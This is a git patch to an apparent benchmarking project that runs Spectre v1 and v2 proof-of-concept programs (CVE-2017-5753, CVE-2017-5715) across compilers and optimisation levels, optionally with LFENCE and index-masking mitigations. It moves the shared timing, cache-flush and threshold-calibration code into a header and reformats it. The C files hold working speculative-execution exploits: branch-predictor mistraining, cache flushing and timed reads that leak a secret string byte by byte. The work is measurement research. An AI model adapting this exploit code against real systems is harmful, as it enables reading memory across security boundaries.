From 47946f6aed078f6769f4f4233ce6543faf974c75 Mon Sep 17 00:00:00 2001 From: Samuel Aubertin Date: Fri, 28 Jan 2022 16:33:17 +0100 Subject: [PATCH] Final touch: style and tabulations. --- Makefile | 6 +- octopus.h | 144 ++++++++++++++++ spectre_v1.c | 471 ++++++++++++++++----------------------------------- spectre_v2.c | 393 ++++++++++++------------------------------ 4 files changed, 400 insertions(+), 614 deletions(-) create mode 100644 octopus.h diff --git a/Makefile b/Makefile index fb1141f..af72e71 100644 --- a/Makefile +++ b/Makefile @@ -34,11 +34,11 @@ LDFLAGS= -fuse-ld=lld CCS= clang gcc OPTIMIZATIONS= 0 1 2 3 fast s RETPOLINE= mretpoline -UUID:= $(shell uuid) +UUID:= $(shell uuid || uuidgen) RESULTS_FILE:= results-$(UUID).json SSH_KEY= octoupload TIMES= 3 -FLAGS= -j +OCTOFLAGS= -j ### Octopus internals CPU:= $(shell LC_ALL=en_US.UTF-8 lscpu | grep "Model name" | cut -d":" -f 2 | sort | uniq | awk '{$$1=$$1;print}') @@ -148,7 +148,7 @@ $(RESULTS_FILE): build for p in $(PROGS); do \ for t in $$(seq $(TIMES)); do \ sleep 0.1; \ - (taskset 01 ./$$p $(FLAGS) || printf "{ \"$$p\": false }")>> $@; \ + (taskset 01 ./$$p $(OCTOFLAGS) || printf "{ \"$$p\": false }")>> $@; \ if ! [ "$$p" = "$(lastword $(PROGS))" ]; \ then echo ',' >> $@; \ else if ! 
[ $$t -eq $(TIMES) ]; \ diff --git a/octopus.h b/octopus.h new file mode 100644 index 0000000..f4dd7f3 --- /dev/null +++ b/octopus.h @@ -0,0 +1,144 @@ +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <stdint.h> +#include <unistd.h> +#include <x86intrin.h> + +#if defined(__i386__) || defined(__amd64__) + #define CACHELINE_SIZE 64 +#else + #error "unsupported architecture" +#endif + +#if defined(__SSE__) && !defined(__SSE2__) + #define NOSSE2 +#endif + +#ifdef NOSSE2 + #define NORDTSCP + #define NOMFENCE + #define NOCLFLUSH +#endif //NOSSE2 + +#ifndef NORDTSCP + #define LATENCY 42 + 42 +#else + #ifndef NOMFENCE + #define LATENCY 18 + 18 + #endif +#endif + +#ifdef MASKING_MITIGATION + /* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 + * + * array_index_mask_nospec() - generate a mask that is ~0UL when the + * bounds check succeeds and 0 otherwise + * @index: array element index + * @size: number of elements in array + * + * Returns: + * 0 - (index < size) + */ + static inline unsigned long + array_index_mask_nospec(unsigned long index, unsigned long size) + { + unsigned long mask; + __asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;" + :"=r" (mask) + :"g"(size),"r" (index) + :"cc"); + return mask; + } +#endif //MASKING_MITIGATION + +#ifdef NOCLFLUSH + #define CACHE_FLUSH_ITERATIONS 2048 + #define CACHE_FLUSH_STRIDE 4096 + + uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS]; + + /* Flush memory using long SSE instructions */ + void + flush_memory_sse(uint8_t * addr) + { + float* p = (float *)addr; + float c = 0.f; + __m128 i = _mm_setr_ps(c, c, c, c); + + int k, l; + /* Non-sequential memory addressing by looping through k by l */ + for (k = 0; k < 4; k++) + for (l = 0; l < 4; l++) + _mm_stream_ps(&p[(l * 4 + k) * 4], i); + } +#endif //NOCLFLUSH + +static inline unsigned +timed_access(volatile uint8_t *addr) +{ + uint64_t t0, t1; + #pragma GCC diagnostic ignored "-Wuninitialized" + unsigned int junk = junk; + #ifndef NORDTSCP 
+ t0 = __rdtscp(& junk); + junk |= *addr; + t1 = __rdtscp(& junk); + #else + #ifndef NOMFENCE + /* + Since the rdstc instruction isn't serialized, newer processors will try to + reorder it, ruining its value as a timing mechanism. + To get around this, we use the mfence instruction to introduce a memory + barrier and force serialization. mfence is used because it is portable across + Intel and AMD. + */ + _mm_mfence(); + t0 = __rdtsc(); + _mm_mfence(); + junk = *addr; + _mm_mfence(); + t1 = __rdtsc(); + _mm_mfence(); + #else + /* + The mfence instruction was introduced with the SSE2 instruction set, so + we have to ifdef it out on pre-SSE2 processors. + Luckily, these older processors don't seem to reorder the rdtsc instruction, + so not having mfence on older processors is less of an issue. + */ + t0 = __rdtsc(); + junk |= *addr; + t1 = __rdtsc(); + #endif // NOMFENCE + #endif // NORDTSCP + return (unsigned)(t1 - t0 - LATENCY); +} + +static void +calibrate_threshold(unsigned int *threshold) +{ + volatile char buf[2 * CACHELINE_SIZE]; + volatile uint8_t* bufp; + int i; + const int cnt = 10000; + uint64_t tcache = 0; + __attribute__((unused)) + volatile int junk = 0; + + bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & ~(CACHELINE_SIZE - 1))); + + junk |= *bufp; + + for (i = 0, tcache = 0; i < cnt; i++) { + tcache += timed_access(bufp); + } + tcache = tcache / cnt; + + if (threshold != NULL) { + *threshold = tcache + LATENCY; + } + return; +} + + diff --git a/spectre_v1.c b/spectre_v1.c index ca17f77..23d3430 100644 --- a/spectre_v1.c +++ b/spectre_v1.c @@ -19,332 +19,148 @@ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
*/ -#include -#include -#include -#include -#include -#include /* for rdtscp and clflush */ +#include "octopus.h" -#if defined(__i386__) || defined(__amd64__) -#define CACHELINE_SIZE 64 -#else -#error "unsupported architecture" -#endif - -#if defined(__SSE__) && !defined(__SSE2__) -#define NOSSE2 -#endif - -#ifdef NOSSE2 -#define NORDTSCP -#define NOMFENCE -#define NOCLFLUSH -#endif //NOSSE2 - -#ifndef NORDTSCP -#define LATENCY 42 + 42 -#else -#ifndef NOMFENCE -#define LATENCY 18 + 18 -#endif -#endif - -#ifdef MASKING_MITIGATION -/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 - * - * array_index_mask_nospec() - generate a mask that is ~0UL when the - * bounds check succeeds and 0 otherwise - * @index: array element index - * @size: number of elements in array - * - * Returns: - * 0 - (index < size) - */ -static inline unsigned long -array_index_mask_nospec( - unsigned long index, - unsigned long size - ) -{ - unsigned long mask; - __asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;" - :"=r" (mask) - :"g"(size),"r" (index) - :"cc"); - return mask; -} -#endif //MASKING_MITIGATION - -#ifdef NOCLFLUSH -#define CACHE_FLUSH_ITERATIONS 2048 -#define CACHE_FLUSH_STRIDE 4096 - -uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS]; - -/* Flush memory using long SSE instructions */ -void -flush_memory_sse( - uint8_t * addr - ) -{ - float * p = (float *)addr; - float c = 0.f; - __m128 i = _mm_setr_ps(c, c, c, c); - - int k, l; - /* Non-sequential memory addressing by looping through k by l */ - for (k = 0; k < 4; k++) - for (l = 0; l < 4; l++) - _mm_stderr_ps(&p[(l * 4 + k) * 4], i); -} -#endif //NOCLFLUSH - -char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; - - -unsigned int array1_size = 16; -uint8_t unused1[64]; -uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; -uint8_t unused2[64]; -uint8_t array2[256 * 
512]; -uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ -unsigned cache_hit_threshold; - - - -static inline unsigned -timed_access( - volatile uint8_t *addr - ) -{ - uint64_t t0, t1; - #pragma GCC diagnostic ignored "-Wuninitialized" - unsigned int junk = junk; - #ifndef NORDTSCP - t0 = __rdtscp(& junk); - junk |= *addr; - t1 = __rdtscp(& junk); - #else - #ifndef NOMFENCE - /* - Since the rdstc instruction isn't serialized, newer processors will try to - reorder it, ruining its value as a timing mechanism. - To get around this, we use the mfence instruction to introduce a memory - barrier and force serialization. mfence is used because it is portable across - Intel and AMD. - */ - _mm_mfence(); - t0 = __rdtsc(); - _mm_mfence(); - junk = * addr; - _mm_mfence(); - t1 = __rdtsc(); - _mm_mfence(); - - #else - /* - The mfence instruction was introduced with the SSE2 instruction set, so - we have to ifdef it out on pre-SSE2 processors. - Luckily, these older processors don't seem to reorder the rdtsc instruction, - so not having mfence on older processors is less of an issue. 
- */ - t0 = __rdtsc(); - junk |= *addr; - t1 = __rdtsc(); - #endif // NOMFENCE - #endif // NORDTSCP - return (unsigned)(t1 - t0 - LATENCY); -} - -static void -calibrate_threshold( - unsigned int *threshold - ) -{ - volatile char buf[2 * CACHELINE_SIZE]; - volatile uint8_t *bufp; - int i; - const int cnt = 10000; - uint64_t tcache = 0; - __attribute__((unused)) - volatile int junk = 0; - - bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & - ~(CACHELINE_SIZE - 1))); - - junk |= *bufp; - - for (i = 0, tcache = 0; i < cnt; i++) { - tcache += timed_access(bufp); - } - tcache = tcache / cnt; - - if (threshold != NULL) { - *threshold = tcache + LATENCY; - } - return; -} +char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; +unsigned int cache_hit_threshold, array1_size = 16; +uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; +uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ void -victim_function( - size_t x - ) +victim_function(size_t x) { - if (x < array1_size) { + if (x < array1_size) { #ifdef LFENCE_MITIGATION - /* - * According to Intel et al, the best way to mitigate this is to - * add a serializing instruction after the boundary check to force - * the retirement of previous instructions before proceeding to - * the read. - * See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf - */ - _mm_lfence(); + /* + * According to Intel et al, the best way to mitigate this is to + * add a serializing instruction after the boundary check to force + * the retirement of previous instructions before proceeding to + * the read. 
+ * See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf + */ + _mm_lfence(); #endif #ifdef MASKING_MITIGATION - x &= array_index_mask_nospec(x, array1_size); + x &= array_index_mask_nospec(x, array1_size); #endif - temp &= array2[array1[x] * 512]; - } + + temp &= array2[array1[x] * 512]; + } } void -leak( - size_t malicious_x, - uint8_t value[2], - int score[2], - unsigned cache_hit_threshold - ) +leak(size_t malicious_x, uint8_t value[2], int score[2], unsigned cache_hit_threshold) { static int results[256]; - int tries, i, j, mix_i; - unsigned int junk = 0; - size_t training_x, x; - volatile uint8_t *addr; + int tries, i, j, mix_i, junk = 0; + size_t training_x, x; + volatile uint8_t* addr; #ifdef NOCLFLUSH - int junk2 = 0; - int l; - (void)junk2; + int junk2 = 0; + int l; + (void)junk2; #endif - for (i = 0; i < 256; i++) { results[i] = 0; - } - - for (tries = 999; tries > 0; tries--) { - - #ifndef NOCLFLUSH - /* Flush array2[256*(0..255)] from cache */ - for (i = 0; i < 256; i++) - _mm_clflush(&array2[i * 512]); - #else - /* Flush array2[256*(0..255)] from cache - using long SSE instruction several times */ - for (j = 0; j < 16; j++) { - for (i = 0; i < 256; i++) { - flush_memory_sse( & array2[i * 512]); - } - } - #endif - - /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ - training_x = tries % array1_size; - for (j = 29; j >= 0; j--) { - #ifndef NOCLFLUSH - _mm_clflush(&array1_size); - #else - /* Alternative to using clflush to flush the CPU cache - * Read addresses at 4096-byte intervals out of a large array. - * Do this around 2000 times, or more depending on CPU cache size. 
*/ - for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) { - junk2 = cache_flush_array[l]; - } - #endif - for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */ - /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */ - /* Avoid jumps in case those tip off the branch predictor */ - x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ - x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */ - x = training_x ^ (x & (malicious_x ^ training_x)); - /* Call the victim! */ - victim_function(x); - - } - - /* Time reads. Order is lightly mixed up to prevent stride prediction */ - for (i = 0; i < 256; i++) { - mix_i = ((i * 167) + 13) & 255; - addr = & array2[mix_i * 512]; - if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) - results[mix_i]++; /* cache hit - add +1 to score for this value */ - } - - /* Locate highest results in j */ - j = -1; - for (i = 0; i < 256; i++) { - if (j < 0 || results[i] >= results[j]) { - j = i; - } - } - if (results[j] >= 3) - break; } + for (tries = 999; tries > 0; tries--) { + #ifndef NOCLFLUSH + /* Flush array2[256*(0..255)] from cache */ + for (i = 0; i < 256; i++) + _mm_clflush(&array2[i * 512]); + #else + /* Flush array2[256*(0..255)] from cache + using long SSE instruction several times */ + for (j = 0; j < 16; j++) { + for (i = 0; i < 256; i++) { + flush_memory_sse(&array2[i * 512]); + } + } + #endif + /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ + training_x = tries % array1_size; + for (j = 29; j >= 0; j--) { + #ifndef NOCLFLUSH + _mm_clflush(&array1_size); + #else + /* Alternative to using clflush to flush the CPU cache + * Read addresses at 4096-byte intervals out of a large array. + * Do this around 2000 times, or more depending on CPU cache size. 
*/ + for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) { + junk2 = cache_flush_array[l]; + } + #endif + for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */ + /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */ + /* Avoid jumps in case those tip off the branch predictor */ + x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ + x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */ + x = training_x ^ (x & (malicious_x ^ training_x)); + /* Call the victim! */ + victim_function(x); + } + /* Time reads. Order is lightly mixed up to prevent stride prediction */ + for (i = 0; i < 256; i++) { + mix_i = ((i * 167) + 13) & 255; + addr = & array2[mix_i * 512]; + if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) + results[mix_i]++; /* cache hit - add +1 to score for this value */ + } + /* Locate highest results in j */ + j = -1; + for (i = 0; i < 256; i++) { + if (j < 0 || results[i] >= results[j]) { + j = i; + } + } + if (results[j] >= 3) + break; + } results[0] ^= junk; /* use junk so code above won’t get optimized out*/ value[0] = (uint8_t) j; score[0] = results[j]; } int -main( - int argc, - char** argv - ) +main(int argc, char** argv) { - int o; size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */ - int i, score[2], len = (int)strlen(secret); - uint8_t value[2]; - unsigned successes = 0; - int json = 0; - + int i, o, score[2], len = (int)strlen(secret), json = 0, successes = 0; + uint8_t value[2]; + while ((o = getopt(argc, argv, "t:j")) != EOF) { switch (o) { case 't': cache_hit_threshold = atoi(optarg); break; - case 'j': + case 'j': json++; - break; + break; default: usage: fprintf(stderr, "usage: %s [-j] " - "[-t threshold]\n" - "\t-j\t\tJSON output\n" - "\t-t INT\t\tfixed threshold\n", argv[0]); + "[-t threshold]\n" + "\t-j\t\tJSON output\n" + "\t-t INT\t\tfixed threshold\n", argv[0]); return 1; 
} } - if (argc != optind) + if (argc != optind) { goto usage; - - fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ", - argv[0] + 2, - (int)strlen(secret)); - + } + + fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ", argv[0] + 2, (int)strlen(secret)); calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold); - #ifdef NOCLFLUSH - for (i = 0; i < (int)sizeof(cache_flush_array); i++) { - cache_flush_array[i] = 1; - } + for (i = 0; i < (int)sizeof(cache_flush_array); i++) { + cache_flush_array[i] = 1; + } #endif - - for (i = 0; i < (int)sizeof(array2); i++) + for (i = 0; i < (int)sizeof(array2); i++) { array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */ - + } while (--len >= 0) { leak(malicious_x++, value, score, cache_hit_threshold); if(score[0] == 3 && value[0] > 31 && value[0] < 127) { @@ -352,63 +168,60 @@ main( fprintf(stderr, "\033[32m%c\033[0m", (value[0])); } else { fprintf(stderr, "\033[31m?\033[0m"); - } + } } fprintf(stderr, "\n"); if (json) { printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2); #ifndef NORDTSCP - printf("\"rdtscp\": true, "); - #else - printf("\"rdtscp\": false, "); - #endif - #ifndef NOMFENCE - printf("\"mfence\": true, "); - #else - printf("\"mfence\": false, "); - #endif - #ifndef NOCLFLUSH - printf("\"clflush\": true "); - #else - printf("\"clflush\": false "); - #endif - printf("}, \"mitigations\": { "); - #ifdef LFENCE_MITIGATION - printf("\"lfence\": true, "); - #else - printf("\"lfence\": false, "); - #endif - #ifdef MASKING_MITIGATION - printf("\"masking\": true "); - #else - printf("\"masking\": false "); - #endif - printf("}, "); + printf("\"rdtscp\": true, "); + #else + printf("\"rdtscp\": false, "); + #endif + #ifndef NOMFENCE + printf("\"mfence\": true, "); + #else + printf("\"mfence\": false, "); + #endif + #ifndef NOCLFLUSH + printf("\"clflush\": true "); + #else + printf("\"clflush\": false "); + #endif + printf("}, \"mitigations\": { "); + #ifdef 
LFENCE_MITIGATION + printf("\"lfence\": true, "); + #else + printf("\"lfence\": false, "); + #endif + #ifdef MASKING_MITIGATION + printf("\"masking\": true "); + #else + printf("\"masking\": false "); + #endif + printf("}, "); printf("\"threshold\": %d, ", cache_hit_threshold); - printf("\"success\": %.0f } }", - 100 * successes / (float)strlen(secret)); + printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret)); } fprintf(stderr, "[+] %-27s\t",argv[0] + 2); #ifndef NORDTSCP - fprintf(stderr, "RDTSCP "); - #else - fprintf(stderr, "RDTSC "); - #endif - #ifndef NOMFENCE - fprintf(stderr, "MFENCE "); - #endif - #ifndef NOCLFLUSH - fprintf(stderr, "CLFLUSH "); - #endif - #ifdef LFENCE_MITIGATION - fprintf(stderr, "LFENCE_MITIGATION "); - #endif - #ifdef MASKING_MITIGATION - fprintf(stderr, "MASKING_MITIGATION "); - #endif - fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", - cache_hit_threshold, - 100 * successes / (float)strlen(secret)); + fprintf(stderr, "RDTSCP "); + #else + fprintf(stderr, "RDTSC "); + #endif + #ifndef NOMFENCE + fprintf(stderr, "MFENCE "); + #endif + #ifndef NOCLFLUSH + fprintf(stderr, "CLFLUSH "); + #endif + #ifdef LFENCE_MITIGATION + fprintf(stderr, "LFENCE_MITIGATION "); + #endif + #ifdef MASKING_MITIGATION + fprintf(stderr, "MASKING_MITIGATION "); + #endif + fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret)); return 0; } diff --git a/spectre_v2.c b/spectre_v2.c index 1e44bd9..bf0aa3a 100644 --- a/spectre_v2.c +++ b/spectre_v2.c @@ -18,83 +18,20 @@ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
*/ -#include -#include -#include -#include -#include -#include /* for rdtscp and clflush */ - -#if defined(__i386__) || defined(__amd64__) -#define CACHELINE_SIZE 64 -#else -#error "unsupported architecture" -#endif - -#if defined(__SSE__) && !defined(__SSE2__) -#define NOSSE2 -#endif - -#ifdef NOSSE2 -#define NORDTSCP -#define NOMFENCE -#define NOCLFLUSH -#endif //NOSSE2 - -#ifndef NORDTSCP -#define LATENCY 42 + 42 -#else -#ifndef NOMFENCE -#define LATENCY 18 + 18 -#endif -#endif +#include "octopus.h" #define GAP 1024 - - -#ifdef NOCLFLUSH -#define CACHE_FLUSH_ITERATIONS 2048 -#define CACHE_FLUSH_STRIDE 4096 - -uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS]; - -/* Flush memory using long SSE instructions */ -void -flush_memory_sse( - uint8_t * addr - ) -{ - float * p = (float *)addr; - float c = 0.f; - __m128 i = _mm_setr_ps(c, c, c, c); - - int k, l; - /* Non-sequential memory addressing by looping through k by l */ - for (k = 0; k < 4; k++) - for (l = 0; l < 4; l++) - _mm_stderr_ps(&p[(l * 4 + k) * 4], i); -} -#endif //NOCLFLUSH - - char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; -uint8_t channel[256 * GAP]; // side channel to extract secret phrase -uint64_t *target; // pointer to indirect call target - -unsigned int array1_size = 16; -uint8_t unused1[64]; -uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; -uint8_t unused2[64]; -uint8_t array2[256 * 512]; +uint64_t* target; // pointer to indirect call target +unsigned int cache_hit_threshold, array1_size = 16; +uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ -unsigned cache_hit_threshold; +uint8_t channel[256 * GAP]; // side channel to extract secret phrase // mistrained target of indirect call int -gadget( - char *addr - ) +gadget(char* addr) { 
return channel[*addr * GAP]; // speculative loads fetch data into the cache } @@ -106,89 +43,13 @@ safe_target() return 42; } -static inline unsigned -timed_access( - volatile uint8_t *addr - ) -{ - uint64_t t0, t1; - #pragma GCC diagnostic ignored "-Wuninitialized" - unsigned int junk; - #ifndef NORDTSCP - t0 = __rdtscp(& junk); - junk |= *addr; - t1 = __rdtscp(& junk); - #else - #ifndef NOMFENCE - /* - Since the rdstc instruction isn't serialized, newer processors will try to - reorder it, ruining its value as a timing mechanism. - To get around this, we use the mfence instruction to introduce a memory - barrier and force serialization. mfence is used because it is portable across - Intel and AMD. - */ - _mm_mfence(); - t0 = __rdtsc(); - _mm_mfence(); - junk = * addr; - _mm_mfence(); - t1 = __rdtsc(); - _mm_mfence(); - - #else - /* - The mfence instruction was introduced with the SSE2 instruction set, so - we have to ifdef it out on pre-SSE2 processors. - Luckily, these older processors don't seem to reorder the rdtsc instruction, - so not having mfence on older processors is less of an issue. 
- */ - t0 = __rdtsc(); - junk |= *addr; - t1 = __rdtsc(); - #endif // NOMFENCE - #endif // NORDTSCP - return (unsigned)(t1 - t0 - LATENCY); -} - -static void -calibrate_threshold( - unsigned int *threshold - ) -{ - volatile char buf[2 * CACHELINE_SIZE]; - volatile uint8_t *bufp; - int i; - const int cnt = 10000; - uint64_t tcache = 0; - __attribute__((unused)) - volatile int junk = 0; - - bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & - ~(CACHELINE_SIZE - 1))); - - junk |= *bufp; - - for (i = 0, tcache = 0; i < cnt; i++) { - tcache += timed_access(bufp); - } - tcache = tcache / cnt; - - if (threshold != NULL) { - *threshold = tcache + LATENCY; - } - return; -} - // function that makes indirect call // note that addr will be passed to gadget via %rdi int -victim_function( - char *addr, - int input - ) +victim_function(char* addr, int input) { - #pragma GCC diagnostic ignored "-Wuninitialized" - unsigned int junk = junk; + #pragma GCC diagnostic ignored "-Wuninitialized" + unsigned int result, junk = junk; // set up branch history buffer (bhb) by performing >29 taken branches // see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html // for details about how the branch prediction mechanism works @@ -197,171 +58,142 @@ victim_function( input += i; junk += input & i; } - - int result; // call *target __asm volatile("callq *%1\n" - "mov %%eax, %0\n" - : "=r" (result) - : "r" (*target) - : "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11"); + "mov %%eax, %0\n" + : "=r" (result) + : "r" (*target) + : "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11"); return result & junk; } static inline void -leak( - char *target_addr, - uint8_t value[2], - int score[2], - unsigned cache_hit_threshold - ) +leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_threshold) { static int results[256]; - int tries, i, j, mix_i; - unsigned int junk = 0; - volatile uint8_t *addr; + int tries, i, j, 
mix_i; + unsigned int junk = 0; + volatile uint8_t* addr; char dummy = '@'; - #ifdef NOCLFLUSH - int junk2 = 0; - int l; - (void)junk2; + int junk2 = 0; + int l; + (void)junk2; #endif - for (i = 0; i < 256; i++) { results[i] = 0; channel[i * GAP] = 1; - } - + } for (tries = 999; tries > 0; tries--) { *target = (uint64_t)&gadget; #ifndef NOMFENCE _mm_mfence(); #endif - for (j = 50; j > 0; j--) { - junk ^= victim_function(&dummy, 0); - } + junk ^= victim_function(&dummy, 0); + } - #ifndef NOMFENCE - _mm_mfence(); + #ifndef NOMFENCE + _mm_mfence(); #endif #ifndef NOCLFLUSH - for (i = 0; i < 256; i++) - _mm_clflush(&channel[i * GAP]); + for (i = 0; i < 256; i++) { + _mm_clflush(&channel[i * GAP]); + } #else - for (j = 0; j < 16; j++) { - for (i = 0; i < 256; i++) { - flush_memory_sse(&channel[i * GAP]); - } - } + for (j = 0; j < 16; j++) { + for (i = 0; i < 256; i++) { + flush_memory_sse(&channel[i * GAP]); + } + } #endif - #ifndef NOMFENCE - _mm_mfence(); - #endif - - // change to safe target - *target = (uint64_t)&safe_target; #ifndef NOMFENCE - _mm_mfence(); - #endif + _mm_mfence(); + #endif + + // change to safe target + *target = (uint64_t)&safe_target; + #ifndef NOMFENCE + _mm_mfence(); + #endif // flush target to prolong misprediction interval #ifndef NOCLFLUSH - _mm_clflush((void*) target); + _mm_clflush((void*) target); #else + flush_memory_sse((void*) target); #endif #ifndef NOMFENCE - _mm_mfence(); + _mm_mfence(); #endif - // call victim - junk ^= victim_function(target_addr, 0); - #ifndef NOMFENCE - _mm_mfence(); + junk ^= victim_function(target_addr, 0); + #ifndef NOMFENCE + _mm_mfence(); #endif - - - // now, the value of *addr_to_read should be cached even though - // the logical execution path never calls gadget() - - // time reads, mix up order to prevent stride prediction - - - /* Time reads. 
Order is lightly mixed up to prevent stride prediction */ - for (i = 0; i < 256; i++) { - mix_i = ((i * 167) + 13) & 255; - addr = & channel[mix_i * GAP]; - if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) - results[mix_i]++; /* cache hit - add +1 to score for this value */ - } - - /* Locate highest results in j */ - j = -1; - for (i = 0; i < 256; i++) { - if (j < 0 || results[i] >= results[j]) { - j = i; - } - } - if (results[j] >= 3) - break; + // now, the value of *addr_to_read should be cached even though + // the logical execution path never calls gadget() + /* Time reads. Order is lightly mixed up to prevent stride prediction */ + for (i = 0; i < 256; i++) { + mix_i = ((i * 167) + 13) & 255; + addr = & channel[mix_i * GAP]; + if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) { + results[mix_i]++; /* cache hit - add +1 to score for this value */ + } + } + /* Locate highest results in j */ + j = -1; + for (i = 0; i < 256; i++) { + if (j < 0 || results[i] >= results[j]) { + j = i; + } + } + if (results[j] >= 3) { + break; + } } - results[0] ^= junk; /* use junk so code above won’t get optimized out*/ value[0] = (uint8_t) j; score[0] = results[j]; } int -main( - int argc, - char** argv - ) +main(int argc, char** argv) { - target = (uint64_t*)malloc(sizeof(uint64_t)); - int o; - //size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */ - int score[2], len = (int)strlen(secret); - uint8_t value[2]; - unsigned successes = 0; - int json = 0; - char *addr = secret; - + int o, score[2], len = (int)strlen(secret), json = 0, successes = 0; + uint8_t value[2]; + char* addr = secret; + while ((o = getopt(argc, argv, "t:j")) != EOF) { switch (o) { case 't': cache_hit_threshold = atoi(optarg); break; - case 'j': + case 'j': json++; - break; + break; default: usage: fprintf(stderr, "usage: %s [-j] " - "[-t threshold]\n" - "\t-j\t\tJSON output\n" - "\t-t INT\t\tfixed 
threshold\n", argv[0]); + "[-t threshold]\n" + "\t-j\t\tJSON output\n" + "\t-t INT\t\tfixed threshold\n", argv[0]); return 1; } } - if (argc != optind) + if (argc != optind) { goto usage; + } - fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", - argv[0] + 2, - len); - + target = (uint64_t*)malloc(sizeof(uint64_t)); + fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", argv[0] + 2, len); calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold); #ifdef NOCLFLUSH - for (i = 0; i < (int)sizeof(cache_flush_array); i++) { - cache_flush_array[i] = 1; - } + for (i = 0; i < (int)sizeof(cache_flush_array); i++) { + cache_flush_array[i] = 1; + } #endif - - //for (i = 0; i < (int)sizeof(array2); i++) - // array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */ - while (--len >= 0) { leak(addr++, value, score, cache_hit_threshold); if(score[0] == 3 && value[0] > 31 && value[0] < 127) { @@ -375,40 +207,37 @@ main( if (json) { printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2); #ifndef NORDTSCP - printf("\"rdtscp\": true, "); - #else - printf("\"rdtscp\": false, "); - #endif - #ifndef NOMFENCE - printf("\"mfence\": true, "); - #else - printf("\"mfence\": false, "); - #endif - #ifndef NOCLFLUSH - printf("\"clflush\": true "); - #else - printf("\"clflush\": false "); - #endif - printf("}, "); + printf("\"rdtscp\": true, "); + #else + printf("\"rdtscp\": false, "); + #endif + #ifndef NOMFENCE + printf("\"mfence\": true, "); + #else + printf("\"mfence\": false, "); + #endif + #ifndef NOCLFLUSH + printf("\"clflush\": true "); + #else + printf("\"clflush\": false "); + #endif + printf("}, "); printf("\"threshold\": %d, ", cache_hit_threshold); - 